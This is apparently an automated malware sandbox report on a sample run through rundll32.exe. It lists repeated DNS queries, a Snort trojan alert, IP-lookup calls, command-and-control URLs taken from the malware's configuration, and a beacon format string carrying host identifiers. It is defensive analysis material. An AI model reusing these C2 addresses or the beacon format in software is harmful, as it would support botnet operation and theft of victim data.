              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficTCP traffic: 192.168.2.2:49759 -> 64.185.227.155:80

              Networking

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: thowerteigime.com
              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: euvereginumet.ru
              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: rhopulforopme.ru
              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 64.185.227.155 80Jump to behavior
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2018316 ET TROJAN Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses 1.1.1.1:53 -> 192.168.2.2:57536
              May check the online IP address of the machine
              Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://thowerteigime.com/8/forum.php
              Source: Malware configuration extractorURLs: http://euvereginumet.ru/8/forum.php
              Source: Malware configuration extractorURLs: http://rhopulforopme.ru/8/forum.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
              Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
              Source: rundll32.exe, rundll32.exe, 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
              Source: rundll32.exe, 00000005.00000003.1759002125.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/D
              Source: rundll32.exe, 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
              Source: rundll32.exe, 00000005.00000003.2644212048.0000000002941000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2154355980.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2504428556.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2270908150.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2210739764.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2278515571.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1767304866.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2305462785.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2259063062.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1997207362.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2261262500.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166981551.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2144326339.0000000002987000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1793878117.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1777395785.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1793878117.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2145848295.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2197094603.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2282571556.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1952161754.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2229738232.0000000002954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://euvereginumet.ru/8/forum.php
              Source: rundll32.exe, 00000005.00000003.1777395785.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://euvereginumet.ru/8/forum.php.ru/8/forum.ph
              Source: rundll32.exe, 00000005.00000003.2329581893.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://euvereginumet.ru/8/forum.php7
              Source: rundll32.exe, 00000005.00000003.2329581893.000000000295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://euvereginumet.ru/8/forum.phpCon
              Source: rundll32.exe, 00000005.00000003.1997207362.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2322656876.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2329581893.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2237144969.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2317554695.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2238857143.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2118717721.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1937072968.0000000002931000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2289863703.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2327783614.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2287389842.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2008220028.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://euvereginumet.ru/8/forum.phpe
              Source: rundll32.exe, 00000005.00000003.1767304866.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2197094603.0000000002954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://euvereginumet.ru/8/forum.phpj
              Source: rundll32.exe, 00000005.00000003.2282571556.0000000002954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://euvereginumet.ru/8/forum.phpl
              Source: rundll32.exe, 00000005.00000003.1759002125.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166981551.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1762608183.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://euvereginumet.ru/8/forum.phpme.ru/8/forum.php
              Source: rundll32.exe, 00000005.00000003.1997207362.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2329581893.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2423532675.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2327783614.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2278515571.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2272679994.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2276651305.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2270908150.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1784421545.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://euvereginumet.ru/8/forum.phps
              Source: rundll32.exe, 00000005.00000003.1956435395.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://euvereginumet.ru/8/forum.phpt.ru/8/forum.php
              Source: rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://euvereginumet.ru/8/forum.phpteigime.com5
              Source: rundll32.exe, 00000005.00000003.2620736040.0000000002941000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2504428556.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2266316387.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1767304866.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1942123360.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1784421545.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2295617717.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2237144969.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2327609022.000000000298B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2669273371.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1952161754.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2299435821.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2303668108.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2237144969.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2435612354.0000000002997000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2327783614.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1789008219.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2293982468.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2154355980.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2192261942.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.php
              Source: rundll32.exe, 00000005.00000003.2118717721.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.php.ru/8/forum.ph
              Source: rundll32.exe, 00000005.00000003.1997207362.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1759002125.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2322656876.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2252179688.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1942123360.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2295617717.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2669273371.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1952161754.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2237144969.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2293982468.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2192261942.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2417726399.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2317554695.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2118717721.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2423532675.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2229738232.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2242990898.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2199214201.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2149855753.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1937072968.0000000002931000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.php7
              Source: rundll32.exe, 00000005.00000003.1997207362.000000000295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpCon
              Source: rundll32.exe, 00000005.00000003.2252179688.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2203720473.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2295617717.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2669273371.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2299435821.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2293982468.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2417726399.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2144410797.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2423532675.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2242990898.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2216357507.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2149855753.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2254606007.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2644212048.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2197094603.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2154355980.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2210739764.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2278515571.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1767304866.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2305462785.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpe
              Source: rundll32.exe, 00000005.00000003.2210739764.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2212107841.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpe.ru/8/forum.php
              Source: rundll32.exe, 00000005.00000003.1997207362.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2295617717.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2299435821.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2293982468.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2504428556.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1784421545.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1878016412.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpet.ru/8/forum.php
              Source: rundll32.exe, 00000005.00000002.2669273371.0000000002925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpginumet.ru5
              Source: rundll32.exe, 00000005.00000003.2259063062.0000000002954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpj
              Source: rundll32.exe, 00000005.00000003.2154355980.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2644212048.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2299435821.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166981551.0000000002954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpl
              Source: rundll32.exe, 00000005.00000003.1952161754.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpme.ru/8/forum.php
